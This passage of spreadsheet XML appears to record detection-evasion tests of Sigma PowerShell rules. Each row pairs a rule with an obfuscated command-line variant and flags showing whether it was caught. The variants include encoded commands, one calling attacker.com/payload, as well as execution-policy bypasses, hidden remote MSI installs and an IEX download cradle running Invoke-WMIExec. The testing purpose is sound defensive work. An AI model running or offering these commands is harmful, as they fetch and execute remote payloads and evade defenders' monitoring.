          <t>powershell.exe -EncODEDCommand Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F3161" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3161" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3161" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3161" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3161" s="43" t="n"/>
      <c r="K3161" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3162" ht="15.75" customHeight="1" s="42">
      <c r="A3162" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3162" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C3162" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D3162" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E3162" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eNcodEDCOmManD Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F3162" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3162" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3162" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3162" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3162" s="43" t="n"/>
      <c r="K3162" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3163" ht="15.75" customHeight="1" s="42">
      <c r="A3163" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3163" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C3163" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D3163" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E3163" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F3163" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3163" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3163" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3163" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3163" s="43" t="n"/>
      <c r="K3163" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3164" ht="15.75" customHeight="1" s="42">
      <c r="A3164" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3164" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C3164" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D3164" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E3164" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENcoDedcomMaND Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F3164" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3164" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3164" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3164" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3164" s="43" t="n"/>
      <c r="K3164" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3165" ht="15.75" customHeight="1" s="42">
      <c r="A3165" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3165" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C3165" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D3165" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E3165" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enCOdEDCOMMaNd Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F3165" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3165" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3165" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3165" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J3165" s="43" t="n"/>
      <c r="K3165" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3166" ht="15.75" customHeight="1" s="42">
      <c r="A3166" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3166" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C3166" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D3166" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E3166" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F3166" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3166" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3166" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3166" s="43" t="n"/>
      <c r="J3166" s="43" t="n"/>
      <c r="K3166" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3167" ht="15.75" customHeight="1" s="42">
      <c r="A3167" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3167" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C3167" s="43" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D3167" s="43" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E3167" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F3167" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3167" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3167" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3167" s="43" t="n"/>
      <c r="J3167" s="43" t="n"/>
      <c r="K3167" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3168" ht="15.75" customHeight="1" s="42">
      <c r="A3168" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3168" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C3168" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D3168" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E3168" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F3168" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3168" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3168" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3168" s="43" t="n"/>
      <c r="J3168" s="43" t="n"/>
      <c r="K3168" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3169" ht="15.75" customHeight="1" s="42">
      <c r="A3169" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3169" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C3169" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D3169" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E3169" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F3169" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3169" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3169" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3169" s="43" t="n"/>
      <c r="J3169" s="43" t="n"/>
      <c r="K3169" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3170" ht="15.75" customHeight="1" s="42">
      <c r="A3170" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3170" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C3170" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D3170" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E3170" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -FilE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F3170" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3170" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3170" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3170" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder (fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4)</t>
        </is>
      </c>
      <c r="J3170" s="43" t="n"/>
      <c r="K3170" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3171" ht="15.75" customHeight="1" s="42">
      <c r="A3171" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3171" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C3171" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D3171" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E3171" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F3171" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3171" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3171" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3171" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder (fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4)</t>
        </is>
      </c>
      <c r="J3171" s="43" t="n"/>
      <c r="K3171" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3172" ht="15.75" customHeight="1" s="42">
      <c r="A3172" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3172" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C3172" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D3172" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E3172" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -FiLe C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F3172" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3172" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3172" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3172" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder (fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4)</t>
        </is>
      </c>
      <c r="J3172" s="43" t="n"/>
      <c r="K3172" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3173" ht="15.75" customHeight="1" s="42">
      <c r="A3173" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3173" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C3173" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D3173" s="43" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E3173" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -fiLE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F3173" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3173" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3173" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3173" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder (fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4)</t>
        </is>
      </c>
      <c r="J3173" s="43" t="n"/>
      <c r="K3173" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3174" ht="15.75" customHeight="1" s="42">
      <c r="A3174" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3174" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C3174" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D3174" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E3174" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"File" C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F3174" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3174" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3174" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3174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Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3174" s="43" t="n"/>
      <c r="K3174" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3175" ht="15.75" customHeight="1" s="42">
      <c r="A3175" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3175" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C3175" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D3175" s="43" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E3175" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F3175" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3175" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3175" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3175" s="43" t="n"/>
      <c r="J3175" s="43" t="n"/>
      <c r="K3175" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3176" ht="15.75" customHeight="1" s="42">
      <c r="A3176" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3176" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3176" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3176" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3176" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w hidden -"c" "$type=[type]::GetTypeFromProgID('WindowsInstaller.Installer'); $inst=[Activator]::CreateInstance($type); $inst.UILevel=2; $inst.InstallProduct('https://example.com/payload.msi', '')"</t>
        </is>
      </c>
      <c r="F3176" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3176" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3176" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3176" s="43" t="n"/>
      <c r="J3176" s="43" t="n"/>
      <c r="K3176" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3177" ht="15.75" customHeight="1" s="42">
      <c r="A3177" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3177" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3177" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3177" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3177" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"W" Hidden -"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F3177" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3177" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3177" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3177" s="43" t="n"/>
      <c r="J3177" s="43" t="n"/>
      <c r="K3177" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3178" ht="15.75" customHeight="1" s="42">
      <c r="A3178" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3178" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3178" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3178" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3178" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F3178" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3178" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3178" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3178" s="43" t="n"/>
      <c r="J3178" s="43" t="n"/>
      <c r="K3178" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3179" ht="15.75" customHeight="1" s="42">
      <c r="A3179" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3179" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3179" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3179" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3179" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F3179" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3179" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3179" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3179" s="43" t="n"/>
      <c r="J3179" s="43" t="n"/>
      <c r="K3179" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3180" ht="15.75" customHeight="1" s="42">
      <c r="A3180" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3180" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C3180" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D3180" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E3180" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"v" 2-Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F3180" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3180" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3180" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3180" s="43" t="n"/>
      <c r="J3180" s="43" t="n"/>
      <c r="K3180" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3181" ht="15.75" customHeight="1" s="42">
      <c r="A3181" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3181" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C3181" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D3181" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E3181" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -v 2.0 /"Command" "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F3181" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3181" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3181" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3181" s="43" t="n"/>
      <c r="J3181" s="43" t="n"/>
      <c r="K3181" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3182" ht="15.75" customHeight="1" s="42">
      <c r="A3182" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3182" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3182" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3182" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3182" s="43" t="inlineStr">
        <is>
          <t>powershell /"nop" -NOni -ExecutionPolicy bypass -w h -"c" "$u=('http://localhost:1337/'|%{(IRM $*)});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F3182" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3182" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3182" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3182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182" s="43" t="n"/>
      <c r="K3182" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3183" ht="15.75" customHeight="1" s="42">
      <c r="A3183" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3183" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3183" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3183" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3183" s="43" t="inlineStr">
        <is>
          <t>powershell -NoProfile -NoNi /"ep" bypass /"w" h -"c" "$u=('http://localhost:1337/'|%{(IRM $*)});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F3183" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3183" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3183" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3183" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc)</t>
        </is>
      </c>
      <c r="J3183" s="43" t="n"/>
      <c r="K3183" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3184" ht="15.75" customHeight="1" s="42">
      <c r="A3184" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3184" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3184" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3184" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3184" s="43" t="inlineStr">
        <is>
          <t>powershell /"nop" -"noni" -ExecutionPolicy bypass -w h -C "$u=('http://localhost:1337/'|%{(IRM $*)});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F3184" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3184" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3184" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3184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184" s="43" t="n"/>
      <c r="K3184" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3185" ht="15.75" customHeight="1" s="42">
      <c r="A3185" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3185" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3185" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3185" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3185" s="43" t="inlineStr">
        <is>
          <t>powershell -nOp -noni -ExecutionPolicy bypass /"w" h -Command "$u=('http://localhost:1337/'|%{(IRM $*)});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F3185" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3185" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3185" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3185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185" s="43" t="n"/>
      <c r="K3185" s="43" t="b">
        <v>0</v>
      </c>
